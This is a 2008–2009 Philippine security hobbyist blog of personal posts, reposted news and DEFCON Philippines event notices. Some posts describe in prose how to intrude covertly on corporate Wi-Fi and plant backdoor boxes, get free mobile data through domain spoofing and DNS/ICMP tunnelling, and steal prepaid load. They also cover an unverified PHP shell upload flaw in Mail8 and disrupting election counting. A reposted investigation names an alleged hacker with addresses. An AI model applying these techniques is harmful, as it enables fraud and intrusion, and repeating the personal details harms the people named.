Continuum...

Killing Time...

2009-08-24T17:19:00.003+08:00

Ok, I'm just killing time here so I decided to blog since I haven't posted anything recently.

Underwent something major in my lovelife. My girlfriend and I almost broke up. We made up but it was pretty emotional for a while. =)

Ok, on to hacking... (what a segue =) )

What's the best portable hacking device? For me it would be the asus eee, the ones with the atheros card for wep cracking. (Cheap too, best criteria =) )

But the problem is, if you're going to hack a specific target, presumably something corporate, you just couldn't walk into the building, pull out your laptop and start hacking in the hallway (And for pete's sake, change the backtrack logo. I've seen you booting it, dead giveaway). Yes, you could probably use a directional antenna, blah blah blah, but the typical scenario in the philippines is, your target just leases a room or a whole floor inside a building in makati. What if it was on the twenty second floor? Also what if the signal strength was just strong enough NOT to be detected outside the building?

So you have to come in close, come in corporate attire (ditch the faded denim pants, black shirt, and backpack), and try to find an inconspicious place to hack out of (the comfort rooms usually found on both ends of the floor is usually sufficient).

But what if the comfort rooms was locked or too far away? (sucks if you really do have to take a piss). You have to go to their receiving area and try to social engineer your way into staying a bit (they may even have free coffee =) ). And again the problem is you just can't pull out your laptop and start hacking there ("Bos, hindi po ito starbaks..."). So the best thing you can do is turn on your laptop beforehand, set up an ad-hoc wifi with broadcasting disabled, put it back inside your bag before you enter the room, and then use your ipod touch, iphone, or even your wifi enabled nokia cellphone to ssh into your laptop. Simple ain't it? =)

Well, there's been a talk about using an ipod touch for mobile hacking, but it's too underpowered compared to a laptop. I hear installing all the right tools can be a bitch too.

Ok, and uhm, about the creepbox (creeper box). It's a gadget you typically leave unseen connected into the target network either through wifi or through an unused lan port (there's probably a creepbox stucked behind your server rack hehe). They're to provide a (usually wifi ap) backdoor to the target network because some targets are offline networks, and some targets really really monitor internet connections (and some targets, in an effort to thwart porn left downloading in the night, disconnect from the internet at night, at least that's what I think their reason is =) ) . These are usually home made kits (soekris) or made from ripped apart netbooks (you could buy a used eee pc 2g for around Php 6k on tipidpc). You could also use an ipod touch (finders keepers), the problem is it's wifi only. I've also toyed with the idea of using linksys wifi routers (they can boot linux). Oh, and on the Stealing The Network series they had one with a gsm modem and set up so it would basically phone home.

So, uhm, what else? Oh, and the hacking stuff above? I haven't done any of it. It's fiction based on some ideas I had =)

I guess that's it...

CICT forms its own cybercrime unit

2009-07-01T08:51:00.000+08:00

Original Story

WITH the prospect of the cybercrime bill becoming a law, the Commission on Information and Communications Technology (CICT) has been slowly putting up a cybersecurity coordination center in its main office in UP Diliman.

The CICT has been lobbying for the passage of the cybercrime bill, which has been sitting in Congress for at least five years.

The bill has already passed the first reading under the Lower House committee on appropriations and a Senate version is already in the works.

The office is headed by former Philippine National Police (PNP) general Virtus Gil, who also served as President Gloria Macapagal-Arroyo’s deputy national security adviser.

In an interview, CICT chairman Ray Anthony Roxas-Chua said the cybercrime division is not yet functional but its people would have the skills to conduct investigations on cybercrime.

Roxas-Chua stressed that the CICT should be leading in the creation of a cybercrime group due to its existing e-government modernization mandate.

He also expects the cybercrime division to help the private sector deal with security threats.

However, the existence of CICT’s cybercrime division is pegged on the passage of the cybercrime bill.

If a law is not passed, Roxas-Chua said they may look into other funding options to keep the cybercrime division, most likely from the e-government fund.

With less than a year to go before the next elections, Roxas-Chua said they are pushing further to have the law passed soon.

“That’s why we’re emphasizing a lot on the need for a cybercrime law. It will protect government IT projects and the country’s growing IT industries,” Roxas-Chua said.

There had been previous attempts at creating an anti-cybercrime group by the government.

The first was in 2004 with the creation of the Task Force for the Security of Critical Infrastructure headed by Abraham Purruganan. It laid out a long-term National Cybersecurity Plan that was not implemented.

Another was the Government Computer Security and Incident Response Team led by the PNP. The National Bureau of Investigation (NBI) also has its Anti-Fraud and Computer Crimes Division.

UBT/FBT Notes

2009-05-18T09:19:00.003+08:00

I won't go much into details.

UBT = Unlimited Browsing Techniques
FBT = Free Browsing Techniques

Basically these are hacks to be able to get online without being charged by the Globe or Smart networks. Almost all of them require a proxy server of some sort. Not all of them work and some only work using a particular network. All of them are illegal so use at your own risk!

*Whitelisted domains

Most networks allow free access to specific domains. The technique is to use a proxy and to trick the filter into thinking the proxy is part of an allowed domain. Ex. allowed-domain.proxy.com. The filter sees the string "allowed-domain" and allows the (proxied) traffic to pass thru uncharged.

*Whitelisted ports

This used to be found on the Globe networks but was (unknowingly?) patched when they did some network upgrades. Basically they allow http traffic on unconventional ports.

*DNS Encapsulation

You could encapsulate other kinds of tcp/ip traffic in dns packets. The network does not charge for domain name lookups, etc.

*ICMP Encapsulation

Similar to DNS encapsulation, you could encapsulate data in ICMP traffic. Some networks charge for ICMP traffic though.

Defconph Beertalk II (Manila)

2009-04-25T13:40:00.004+08:00

Ok. A quick review of what went down last night.

Got to the venue a bit late. When I got in the event had started and tikbalang was already presenting. There were a bunch of guys who came in the same time of me and we were all standing at the back. There were about ten of us who stood at the back until the presentation ended and we found available seats. Saw some slides about something about Amazon but between trying to find a good spot and the slightly poor audio I didn't understand what the presentation was about.

*Major Gripe; The venue was freaking HOT!*

It was so bad that I couldn't take it anymore and I decided to go outside while the Bullsh!t presentation was ongoing since I was not really that interested in his topic which was about a botnet. There were several of us outside and we just talked while occasionally peering in to look at the presentation.

The last speaker (thestare) did not start immediately after Bullsh!t's presentation and by the time his presentation started I've met some of my past acquaintances and we were shooting the breeze and smoking outside while he gave his presentation.

So I basically missed the first presentation. Wasn't really interested in the second one. And was standing outside during the third presentation. I'll just download the slides when they put it online.

Hackista. I came in wanting to join the game. Became bummed out because of the heat that I backed out. By the time the game started I became a bit excited and pulled out my laptop. Because of the heat inside the venue the group I was with had started hanging out inside the adjoining restaurant/bar. The game master had given an initial ip address but because of some network problems they decided to change it. Non-issue except that we were outside the venue and we're trying to attack the old ip add hehe. Somebody then told us the new target ip. But the network was having problems and I couldn't connect to the network. And also a major problem, for me anyways, with all the excitement I needed to smoke and unfortunately the restaurant we were in didn't allow smoking. So I had to either go outside or go inside the venue where smoking was allowed. Between this, and the network problems I just decided to shut down the laptop and not play anymore. Also, this was my first time to join a CTF and I was a bit bothered by all the people walking by, standing behind you and trying to look at what you're doing. Definitely not my usual environment. Maybe next ime I'll be able to adjust.

The CTF seemed to be the best part of the event. A foreigner won the game. I talked to him while he was trying to exploit the target. Another first for me, talking to a foreign hacker live :) Actually we seemed to be having the same ideas at the time about how to exploit the target. He had already gotten a shell by then but his connection has stopped responding. Anyway congratulations to him and his company. Oh, and the gamemaster was drunk hehe.

And that's it. Lots of beer available which was a very good thing. Met some new people, hanged out with some old ones.

*Edit* Edited out thestare being late because apparently he gave notice to the organizers that he had a prior engagement

Linux Most Hacked

2009-04-07T18:17:00.003+08:00

Original Story

Interesting story about Philippine websites defaced during the last six years. Statistics show that hackers seem to like linux;

"Hackers used the Linux Operating System (OS) to deface 507 of the websites, WIN2000 71 times; and WIN2003, FREEBSD and WINNT9X 13 times each.

Of the 667 government websites defaced during the period, 507 or 76 percent were using Linux as their OS."

"Sosa said they have identified 134 “coded defacers” who attacked government websites during the period and tagged a group called “Hackers” as the one with the most number of intrusions at 248 in 2006 alone followed by the “Ashiyane Digital Security Team” with 106 hits, and “Infern.4iL” with 17.

The others are “Saudi Security Terror” and “Skorptix” with nine attacks each; ‘Denger’ with eight hits; “HMEI,” “DARK HUNTER” and HIS IRAN HACKER SABOTAGE” with seven intrusions each. A group called “ALPTURKTIGIN” and “REBARZ99,” the well-known Filipino hacker each scored six hits during the same period.

The remaining 123 “coded hackers” have insignificant frequency of attacks varying from five to one intrusion a year, Sosa said. "

A group called Hackers hehehe. Isn't that a collective noun which would explain the higher number of intrusions? Rebarz99 seems to be the only filipino hacker mentioned. Prime candidate to be made an "example" since the others are foreigners and would be impossible for the PNP to capture. And why are some websites repeatedly "hit" ? Wouldn't a single or double be enough grounds to secure and prevent future hits? No statistics on the method of intrusion and if any of the hackers were caught. Interestingly enough the article was ended on the emphasis that the hacked servers were running linux.

"...the Linux Operating System, a free and openly available software which makes them highly vulnerable to hacking"

I'm waiting to see how the PLUG members react to this =)

Uhm, Duh?

2009-03-31T11:45:00.003+08:00

Reports that computers of the Department of Foreign Affairs had been hacked triggers concerns about the nation's need for a cybersecurity program.

http://newsinfo.inquirer.net/breakingnews/infotech/view/20090330-196886/Cyber_spies_hack_into_DFA_computers

http://technology.inquirer.net/infotech/infotech/view/20090330-197020/DFA-to-investigate-hacking-report

http://technology.inquirer.net/infotech/infotech/view/20090331-197122/RP-govt-websites-vulnerable-to-hacking

http://technology.inquirer.net/infotech/infotech/view/20090330-197041/RP-needs-cybersecurity-program--CICT

More jobs for the nations licensed pentesters and cybersecurity professionals.

Grrr...

2009-03-26T11:34:00.001+08:00

Comelec dares hackers to crack software

2009-03-17T19:48:00.002+08:00

(Too tired to comment on this and the preceeding blog entry. Only putting it here for easy reference and for posterity's sake)

Original Story

MANILA, Philippines—Let’s see if old-fashioned dagdag-bawas (vote-padding and shaving) schemes can catch up with technology.

The Commission on Elections (Comelec) is challenging computer hackers to take a crack at the software that will be used in the 2010 elections to prove that the system is secure from fraud and tampering.

“By the time a hacker gets into our system, the election is over,” Comelec Executive Director Jose Tolentino boldly declared Monday in a press briefing.

Tolentino said the Comelec would welcome cyber-security experts who wish to check the system for weaknesses.

Programmers and the general public can also scrutinize the source code of the company that will bag the P11.3-billion automation contract for the 2010 national elections.

The source code refers to the set of programs that carries the system’s instructions.

“The winning bidder’s software, the source code, will be open to inspection by the public,” Tolentino told reporters.

“They can look at it line by line to ensure that there is no malicious program inside,” he said.

The Comelec will also open the system and the machines to “ethical hackers” or IT experts who would be allowed by the agency to test the system.

“Then there are those who might try to hack the system without telling us. That’s OK. We are open to that,” he said.

Tolentino was parrying criticisms from politicians, poll watchdogs, and some IT experts who fear that the Comelec’s adoption of the Precinct Counting Optical Scan (PCOS) system would only give rise to a new, more sophisticated mode of election cheating.

Doubters

PCOS refers to the general scheme that the Comelec had chosen for the casting, counting and canvassing of votes for the 2010 elections. Up for bidding next month is the contract for the specific software and voting and counting machines on which the PCOS will be run.

Doubting the Comelec’s readiness to fully automate by May 2010, former Comelec Chair Christian Monsod earlier warned that “software specialists” would now take on the dirty job previously carried out manually by unscrupulous poll personnel and political operatives.

Among the infamous methods of large-scale fraud widely alleged to have marred past manual elections was the so-called dagdag-bawas scheme, or the manipulation of election results through vote padding and shaving.

IT expert and transparentelections.org head Gus Lugman had also noted that the Comelec would be relying on software “not written in the Philippines.”

But Tolentino Monday said anyone who planned to attack the system would not only need technical expertise but also huge funding to set up powerful computers that could crack the 128-bit encryption code.

Stored at BSP

For added security, the source code of the chosen system will be stored “in escrow” at the Bangko Sentral ng Pilipinas (BSP), he added.

Also Monday, Comelec Chair Jose Melo presented the poll body’s terms of reference (TOR) or the technical and financial requirements for the contract bidders.

The TOR mainly requires interested suppliers to provide a paper-based automation election system, a system for the electronic transmission of the results, and a management plan governing the entire process.

The Comelec will release the TOR documents, priced at $20,000 per set, on March 18.

10 bidders

“The last day of purchasing (the documents) is on March 25. On March 27, there would be a pre-bidding conference where bidders can seek to clarify matters,” Melo said.

The Comelec will open the bids on April 27 and award the contract not later than May 21.

Melo earlier announced that 10 companies had expressed interest in joining the bidding for the P11.3-billion automation contract.

He then assured critics that since these companies have international operations and reputations to protect, they would not allow their products to be used for fraud in the coming Philippine elections.

Defconph BeerTalk II (Manila)

2009-03-17T19:44:00.001+08:00

Where:
Grilla Paseo De Roxas Avenue Branch, Makati
Near Greenbelt

When:
April 24, 2009 @ 1900 HRS PHT

Who Should Attend:
Everyone can attend not just IT enthusiasts. We mean everyone, humans on different fields like Feds, Lawyers, Salesman, anyone who are willing to learn what is going on with information security these days.

Registration Fee:
Early Php800.00 / Late Registration Php1500.00 includes DEFCONPH Official T-shirt, 2 Bottle of Booze and 2 Slice of Pizza

NOTE: Early Registration closes on April 12, 2009

DEFCON Philippines BeerTalk II(Manila) Full Track
7:00PM - 7:10PM Welcome Address
7:10PM - 7:30PM Introduction to DEFCON Philippines
7:30PM - 8:20PM Unconventional Privilege Escalation
8:20PM - 8:30PM Q&A
8:30PM - 9:20PM Penetration Testing, A Structured Approach: Conducting Penetration Tests in a business environment
9:20PM - 9:30PM Q&A
10:30PM - 11:20PM The Waledac Botnet
11:20PM - 11:30PM Q&A
11:30PM - 12:30PM Games - Hackista 2009 (Øpen Hack Challenge)
12:30PM - 12:45PM Closing Remarks / Awards and Recognition
12:45PM - onwards More BEER .... ..... .... Drink til you Drop

Unconventional Privilege Escalation

Speaker: Tikbalang

Synopsis: Conventional privilege escalation deals with vulnerabilities and acquiring root level in the system. Is there a way of escalating privilege (unconventionally) without having the root level? Up to what extent can the escalations go? Is it really a threat to consider? Are people affected by this?

Penetration Testing, A Structured Approach: Conducting Penetration Tests in a business environment

Speaker: theStare

Synopsis: Recent developments concerning regulatory requirements, the current financial turmoil and rising security threats to organizations have opened the doors of business for various security service providers. Organizations are looking for service providers who understand their business and its associated risks, capable of assessing their current security posture, identify any gaps, and provide cost-effective recommendations that can reasonably address these gaps. They are searching for professionals who can perform these services in an organized manner, using a sound approach and a proven methodology. This talk deals with the details of managing penetration testing engagements, right from proposal preparation up to report delivery.

The Waledac Botnet

Speaker: Bullsh!t

Synopsis: Botnet technology and techniques are continuously evolving, and currently, the Waledac botnet is probably the most advanced botnet out there.

In this presentation, we will give a brief overview on botnet evolution, the technical aspects of Waledac, the botnet, what it does, and how the bot masters are raking in cash out of this.

Hackista 2009 (Øpen Hack Challenge)

Mechanics: The goal of this challenge is to obtain administrative level privileges on a windows 2000 server with no security patches by exploiting vulnerabilities in the RPC/LSASS Services on the target machine. The target machine IP address will be announced prior to the start of the challenge. Upon successful compromise, create a text file with your name on the target machine's desktop and notify any of the the goons for verification. The first one to compromise the machine after verification will be considered the winner and gets a change to do a demo on the methods he used. The first one to create their HANDLE.txt on the desktop of the compromised machine wins the game.

Tools: Any hacking tools are allowed, Metasploit, Nessus, Nmap etc..

Rules: No direct DoS on the server, anyone caught DoSing the server will automatically disqualify you from the game.

Price: The first one to create handle.txt will be getting black badge, black badge entitles you for lifetime access to the DEFCON Philippines event.

Poll machines prone to hacking -- IT expert

2009-03-07T21:54:00.002+08:00

Original Story

The high-tech poll machines that will be used by the Commission on Elections (COMELEC) in the 2010 elections are prone to hacking, an IT expert said Thursday.

“The [poll] machines are only computers, they can be hacked. Someone can insert bad instructions into it and manipulate data,” IT expert Ike Señeres, former director-general of the National Computer Center, told ABS-CBN’s morning show, “Umagang Kay Ganda.”

Señeres explained that computers with vulnerable operating systems (OS) can be infected by viruses.

He said that the machines used by COMELEC in the ARMM elections used Windows, which he said is vulnerable to virus and hacking.

He added that the poll machines can also be manipulated by an “untrustworthy” person.

Señeres said that if COMELEC would allow him, he will sit in a room and if given enough time, he can hack into the poll machines and manipulate the results of the elections.

COMELEC spokesman James Jimenez admitted that there are no “fool-proof” systems and even an automated election can still be rigged.

Jimenez, however, said that critics of the automated elections should be reminded that the COMELEC is trying to replace a “system that is flawed and vulnerable.”

“With the automated system, it is new and it is less vulnerable,” he said.

Señeres, meanwhile, said that the possibility of the automated being hacked can still be prevented by helping COMELEC guard the process.

PCOS not OMR

COMELEC Chairman Jose Melo, meanwhile, said that the poll body will be using precinct count optical scan (PCOS), an improved version of the optical mark reader (OMR), which was used in the ARMM elections.

Melo said that compared with the OMR, PCOS has better security features and less vulnerable to cheating.

He said PCOS can take pictures of the ballots inserted by voters into the voting machines. He said the ballots' images are transmitted to COMELEC for better monitoring of the ballots' conditions.

The COMELEC had said that it will set up at least 80,000 PCOS machines nationwide during the May 2010 elections.

It said 14,000 units will be deployed around Metro Manila, 13,000 units in urban areas, 3,000 units in problem areas and 50,000 to each voting precincts in the rural areas.

OES on standby

Melo, meanwhile, said the COMELEC will put as standby the proposed "open election system" or the half manual, half automated elections.

He said if ever the winning supplier of the PCOS machines fail to meet COMELEC standards, it will be forced to switch to the open system.

"We won't have enough time to conduct another bidding, so we have to go manual," Melo said.

He said the COMELEC will publish the terms of reference for the meeting this month and start the actual bidding by April.

He said they will set the final testing for the poll machines on November 17.

By December 2009, the COMELEC will start educating teachers and their employees on how to use the poll machines.

In a marathon session that started Wednesday night, the Senate approved the supplemental budget bill for the COMELEC to implement automation in the 2010 elections.

Senators approved the budget bill with a provision for "transparency and accuracy in the selection of the relevant technology of the voting machines to be used for the May 10, 2010 automated and local elections."

The Senate passed the supplemental budget on its last session day before it goes on a five-week Lenten recess starting March 7.

House Bill 5715 was passed by the House of Representatives on Monday evening and was then transmitted to the Senate the next day.

The supplemental budget bill will still have to go through a bicameral debate.

Automation shortens the window needed to cheat. Couple that with PCOS, a nice md5sum+timestamp hashing algorithm, a secure way of transmission, and that would be way way better than the system used before.

It could be possible to install trojans prior to the election but that would require physical access to the (possibly hundreds of) machines since I doubt that they would be online prior to the election. And I'm sure (actually hoping) that they're going to be heavily guarded prior to deployment. Weak point could be in the counting mechanism itself. You could somehow sniff the connection, find out the receiving ip address(es), determine the protocol format (probably POST data to a webserver with the md5sum+timestamp I was talking about earlier), send a spoofed corrupted message, and (hopefully?) crash the counting mechanism. A DoS would be enough to undermine the validity of the election. Politically, that would also be enough.

SILICAQ Released

2009-03-01T18:54:00.004+08:00

SILICAQ is a handheld penetration testing and security assessment device sold by Immunity, Inc.

It's predecessor SILICA used the Nokia 770 as the hardware platform. SILICAQ seems to be using different hardware.

SILICA price = $3600.00
SILICAQ price = $8500.00

Using the current Peso exchange rate;

$8500.00 X 48 = PHP 408,000.00

Here's a Honda CRV SUV being sold for PHP 400,000.00 =)

Heh, quite expensive!

I think I'm gonna sell my personal penetration testing netbook. It's an eee 900 running Ubuntu. Some features;
- uses non standard drivers that enable you to inject and sniff data wirelesly
- Nmap installed
- Metasploit installed
- Aircrack-ng installed with a single command to scan, inject packets, and crack
the WEP key for an AP you select
- ability to connect to (and scan/exploit) a wired LAN (I'm guessing SILICAQ can't do this =) )
- Karmetasploit installed
- Virtualbox installed with a Windows XP virtual machine to give access to all your Windows-based tools.
- Firefox and Open Office installed for all your normal internet surfing, work-related stuff
- Different pentest tools installed for you to play with

Normal eee 900 specs except that it's upgraded to 2 gig RAM

Price is PHP 19,500. Interested buyers email me at sujiru@gmail.com =)

Sulit.com.ph Hacking Incident

2009-02-28T17:10:00.002+08:00

Awesome story of how the guy who hacked sulit.com.ph was traced. It would be very interesting to follow his (possible) ensuing trial.

Original story source

So let's say you run a website with huge, huge traffic. You have a big, dedicated community, and you're raking in the ad money. Then one day, you see that your site has been hacked. You can't find a way to get inside to fix it, and your formerly awesome site is now one big ad generating revenue for somebody. That sucks, right?

That is what happened to Sulit.com.ph, the largest free classified ads site in the company.

Back in November 6, 2008, Sulit, along with some high-traffic Filipino websites, all using the .ph domain, mysteriously went down and were pointed to SEDO advertising pages. This happened just after makeuseof.com was hacked and was pointed to an advertising page. Of course, panic ensued. Onthe web, there was rampant speculation of domain hacking and poisoning, and for a while, everybody was scared of their domains going down.

As it turned out, this wasn't just an ordinary case of a hacker trying to prove he could do something. This guy wanted to actually profit from his misdeeds, a case of fame taking a back seat to fortune.

While this was going on, we at dotPH were working round the clock to stop further hacking, and more importantly, to catch this hacker.

How to catch a hacker

Everything you do on the web leaves a digital fingerprint behind. Whenever you make a transaction, leave a comment on a blog entry, or even watch a video at youtube, those websites will take note of your IP address. It's like leaving behind a digital trail of crumbs for internet detectives to follow. It's like CSI, only without the UV lights and the gross bodily fluid splatters.

dotPH head developer Sherwin Daganato soon checked our logs during the time it happened. He was able to paint a pretty clear picture on what the hacker did, step-by-step. On 9:24 PM of November 6, 2008, the hacker, using Internet Explorer 7 on a Windows XP computer, logged into our system and exploited a vunerability in our website. He tried to log in to Sulit.com.ph's account. Then he clicked on the "Forgot Password" button. Using a specially-crafted cookie, he was able to get into our system without having to enter the correct password. He was now inside Sulit.com.ph's account. First thing he did was to change the login information there, effectively locking out the legitimate owner of of the account. He then pointed the domain to his own Sedo account, so that he is able to monetize any traffic made by Sulit.com.ph. The hacker also used the same process on more .ph sites.

Sherwin was able to get the IP addresses of the hacker. We also know that the hacker, in all of the times he broke into our system, used MS Internet Explorer (Version 7), and the same Operating System version (MS Windows XP). We noticed that the hacker was using the same series of IP addresses, and he was using Bayantel. A quick GeoIP scan of the IP addresses point it to Legaspi City, Albay.

We contacted Bayantel to give us more information regarding the IP addresses. At first they were reluctant to cooperate because disclosing information about their subscribers isn't really company policy. We explained that one of their accounts was used in a hacking incident, which is against their terms and conditions. Bayantel was pretty cooperative afterwards, giving us the name the subscriber: Mark Anthony Clemente. Clemente's registered address is at Clemente Building, Gov. Forbes St., Legaspi City, Albay.

Following the money trail

Sulit.com.ph and the other hacked sites were pointed to a SEDO advertising account. We were pretty sure that the SEDO account contains the real name of the hacker, because how else is he going to claim his money? Calling SEDO, we explained the situtation, and we needed to get the name of the hacker behind the account.

SEDO was reluctant to give us the information at first. It was understandable, because nobody wants to have their financial information readily available. SEDO told us that they suspended some accounts that made a lot of money in a short period of time. We asked them if they could give us info on these suspended accounts. Again, we got a "we can't answer that" from SEDO. In a gamble, we told them that we'll say some domains, and they tell us if they encountered those domains, or if those domains are familliar to them.

"So, is Sulit.com.ph familliar to you?" we asked SEDO.

"Yes."

And we mentioned around five domains, all getting a "Yes" from the SEDO representative. By the time we mentioned the fifth domain, the representative just laughed because everything was right on the money. The noose was tightening around our hacker.

Closing In

Since we learned of the IP addresses used by the hacker, we had been monitoring our system to see if the same IP addresses get in again. True enough, since the hacker was already able to get inside our system easily the first time around, he got greedy and created seven (7) new domains using the same IP address range used to hack the domains. Interestingly, the seven new domains had an expiry period of ten (10) years each. These new domains were created under the reseller account of an Alex Laguilles, from Gov. Forbes St., Legaspi City, Albay.

We just needed a way to confirm if he owns those domains. Laguilles had registered his legitimate and hacked domains under fake names and addresses like “Alex Pogi”. Using fake names and/or addresses were against our terms of use.

We called Laguilles, hoping to gain more information. During the call, our representative immediately identified himself as a dotPH employee, and Laguilles went silent for a good few moments. Afterwards, he was audibly nervous. We decided to not confront him on the hacking issue just yet. Instead, we asked him about the domains he legitimately owns, and why were they registered under fake names like "Alex Pogi".

He admitted that he owns those domains, but mid-conversation he backtracks and says that he just registered those domains for a friend. We also asked him if he uses MS Internet Explorer (Version 7), and the same Operating System version (MS Windows XP) when he surfs the internet, and he says yes.

We advised him to change the ownership of the domains to real names and addresses.

At the end of the call, he asks us "Yun lang? (That's it?)," apparently expecting something worse.

Result: He basically admits to accessing the same dotPH account used in the hacking, and using the same computer and browser the hacker used.

We then called SEDO again to see if both hacked domains and new domains were pointed to the same account. SEDO confirmed that they were, and that they had already suspended all payments because of our concern and also the unusually high volume of traffic -- usually indicates fraudulent clickthroughs.

All we need to close this case would be to prove that Lagulles was indeed the hacker, and to see if he was working with somebody else.

Going Cloak and Dagger

We sent Mario Inocando to Legaspi City. As our operative was en route to Albay, we were gathering all that we can about Legaspi City, Clemente Building, Mark Clemente, and Alex Laguilles. Looking up the address on Wikimapia to make sure our operative knows the exact location, we coordinated with our operative every step of the way.

We even provided our operative with a spy camera (yes, that camera inspired hundreds of bad James Bond jokes). This proved to be pretty useful afterwards, because our operative was able to send us surveilance photos of Clemente Building. Well, the operative was at a loss on how to approach the people inside the building and we needed the photos to figure out a plan.

There was an office called Megapixel on the ground floor. We decided that the best way to approach them without arousing any suspicion was to pretend to be interested in their business. We called them up. As we fished for information about Clemente and Laguilles, we found out that Megapixel is owned by Clemente. We told them that we were sending somebody so our operative won't come off as suspicious.

True enough, our operative was able to talk to the people at Vodacom. Even though Clememte and Laguilles were not present at that time, he was able to gain a great deal of information.

We found out that Alex Laguilles worked as a developer/programmer for Vodacom, another company owned by Clemente. Vodacom is also housed in the same building. Laguilles used the office internet connection that Clemente owns (which explains the IP addresses) to hack into our system. Interestingly enough, the people there knew about the hacking incident, even though they were reluctant to disclose any of the details. So far, no evidence points to Clemente being involved in this, except that his internet account being used (probably without his knowledge) for the hacking incident.

The hacking incident took place on November 6, and by Monday the 10th we had already ID'ed the guy and found out where he operates from. It took us some more time to get the documentation needed to file a case, after which we handed all our evidence to NBI. Laguilles should be expecting a knock on his door any time soon.

Now all evidence points to Laguilles not being in the hacking game for long. He probably found a hole in our security and he used it for monetary gain. There was no real effort at all to cover his tracks. There will be more hackers, and they will not be as careless as Laguilles. dotPH will remain vigilant for more hacking incidents in our system, and end any hacking activity as soon as we detect it, find the source, and use legal action agains the perpetrators.

BDO ATM Cmd Shell

2009-01-11T16:17:00.005+08:00

Great shot by Yugatech of a Banco De Oro ATM machine dropping to a cmd shell and executing an ftp script. The ip address shown is inside their local network and uploads are sent to a "backup" folder. Seems to be a backup script executed by the "at" service which is why the script is executed by svchost.exe. No idea why it would show the cmd window although unless the /interactive switch was included although that would be very weird on such a machine. Some exploits do execute a cmd shell through svchost though. =)

I.T. Security Bootcamp 2009

2009-01-06T13:57:00.005+08:00

Brought to you by Bitshield

Other events scheduled are;

EC-Council Certified Security Analyst/Licensed Penetration Tester
January 23, 24, 30, 31 & February 13, 2009

Certified Ethical Hacking and Countermeasures

February 20, 21, 27, 28 & March 6, 2009

Certified Ethical Hacking and Countermeasures

IT Security Essentials
"Are You Safe And Secure?" January 26, 2009

The I.T. Security Bootcamp 2009 costs 7,000.00 Php but you get to stay at a resort in Puerto Galera =) There's probably a separate fee for the CompTIA Security+ Examination though, the ad didn't state that =)

Defconph.org's Bloggers Conference Meeting

2008-12-14T20:10:00.002+08:00

In an email sent to it's members, the organizers of defconph.org gave a brief summary of what happened at the meeting with members of the Cebu Bloggers Society.

Greetings DefconPH Forum Members,

This is to inform you that the Bloggers Conference Meeting with DefconPH this morning (Dec. 14, 2008) was successful with the presence of some members of Cebu Bloggers Society. We started at around 1030AM and finished at around 12noon, location was at Bo's Coffee Shop near Cebu Doctor's College.

Agenda during the Bloggers Conference Meeting (Dec. 14, 2008):
a) Intro about DefconPH as an organization
b) Overview about the topics on Dec. 20, 2008
c) What to expect from DefconPH
d) Future Plans of DefconPH
e) Mechanics of some games during the Con (June 2009)
f) Inviting members to help organize future events of DefconPH
g) Look for sponsors for the Con on June 2009
h) TShirts to be distributed on Dec. 17, 2008 at the event venue
i) History of well known IT Professionals / h**kers
j) And many more...

DefconPH is not a company but an organization. The success of the organization entirely depends on its members.

Like what I said to Semprix, let's start small using our available resources and manpower.

Thanks for your support and we're always looking for members who can actively contribute for the success of DefconPH, collectively.

Thanks and more power to you as well.

Globe Network Hacking

2008-12-14T18:38:00.002+08:00

I found all this information at http://pinoymobiles.blogspot.com/2008/10/globe-network-hacking.html. I don't know if this still works.

"Paano nangyayari ang bagay na ito?

Simple lang at di ko na ipapaliwanag kung paano gawin baka may ibang gumaya at magsamantala.
I was one of the hacker/abuser dahil akala ko walang apektadong tao at simpleng glitch lamang
ito hanggang sa may nagtext sa akin na "huhuhuh ang load ko, bakit na share sa iyo" at binalik
ko naman dahil malay ko pang ang taong iyon eh last money na ang pinang-load niya.

Ito ang mga bagay na ginagamit ng mga hackers/abusers/parasites:

1-3 Globe Simcard
1st (host/passer)
2nd (Leecher)
3rd (Final Receiver)

1 to 3 Mobile Phones

Smart Network
Network settings
Globe's 222"...

"How it works?

For example ang # ni sim 1 is: 0916 xxx xxx1
then gagawin niya ang settings
magbabal inquiry ng 2-3x
ang unang bal niya is ung original balance nya, sabihin na nating 0.
ikalawang/bal niya ay magiging 1-99999 depende sa mahuhuli ng network na sim.
now na nagawa na ang settings mag-iiba na ang # ni sim # 1 and magiging # niya ay ang nahuli ng network i.e 0927 xxx xxx3
ung load nung nahuling sim card ay pwede ng itransfer sa Sim # 2. then para maiwasan ni Sim # 2 na matrace ng original owner ng nabiktimang simcard epapasa naman ni sim # 2 kay Sim # 3 ang nanakaw na load.

Kung naka pin ang share a load mo, safe ang load mo. Pero ang call hindi. Now kapag naka activate ang barring + Fixed Dialling, once na napili ng network ang Sim mo, May makikita kang message na Sim Registration Failed, Phone will now Restart. Talo ang Hacker!"

The 0day will cost you....

2008-12-13T11:32:00.002+08:00

$15,ooo apparently.

This is for the Internet Explorer XML parsing overflow. There's a nice analysis here.

http://www.pcworld.com/article/155312/.html

"Information on the vulnerability was allegedly sold in November on the underground back market for US$15,000. Earlier this month, the exploit was sold second or third hand for $650, said iDefense, citing knownsec."

Kinda what I posted here.

Mail8 Vulnerability

2008-12-09T23:01:00.003+08:00

Mail8 is a simple webmail application written in PHP which can be used and integrated in any Email Server supporting IMAP protocol. It's released by 8Layer. I became aware of them when I saw this thread on the Linuxjobs.ph mailing list. I downloaded Mail8 and had a quick look at it. compose.php doesn't seem to have any session control and allows php files to be uploaded to the attachments folder. So quite easy to upload a php shell and get command execution (depending on the servers' php setup).

*I need to have someone verify the flaw since I was in a hurry when I did this and I have limited access to a webserver nowadays. I also think attach.php can be called directly anyways =)

Put Up OR Shut Up (PUORSU) Conference

2008-11-24T02:39:00.005+08:00

* I'm calling it PUORSU rather than PUOSU because I find it easier to read as *pursue*, as in to pursue knowledge =) *

The conference was held on Nov. 20, 2008 in a cafe located near East Ave, QC. The discussion regarding the final date and venue was moved off the PLUG list since drexx wanted to keep the number of attendees to a minimum. Confirmation as to whether the event would push through was rather sketchy since the event was so informal that the general attitude seemed to be "just go there and we'll see". Not that big a deal if you were not planning on skipping work and travelling quite a distance to go there =)

I got to the venue around 10:20 AM. Philip and Joebert were there ahead of me. Both had their laptops open and were apparently already playing with Metasploit. We basically just talked a bit while we waited for the others. After about 30 minutes we started getting apprehensive that the others were either not going to come or had gotten lost (the number on the address emailed to us was wrong). We debated whether to go to Robinson's for some free wi-fi or to setup an ad-hoc network so we can practice on the VM's Philip had brought. We settled going for the ad-hoc network. We had a bit of delay trying to setup philip's laptop as the host for the network. I made the discovery that wicd doesn't correctly configure ad-hoc on my laptop. I was going for the manual setup when Jumbz arrived.

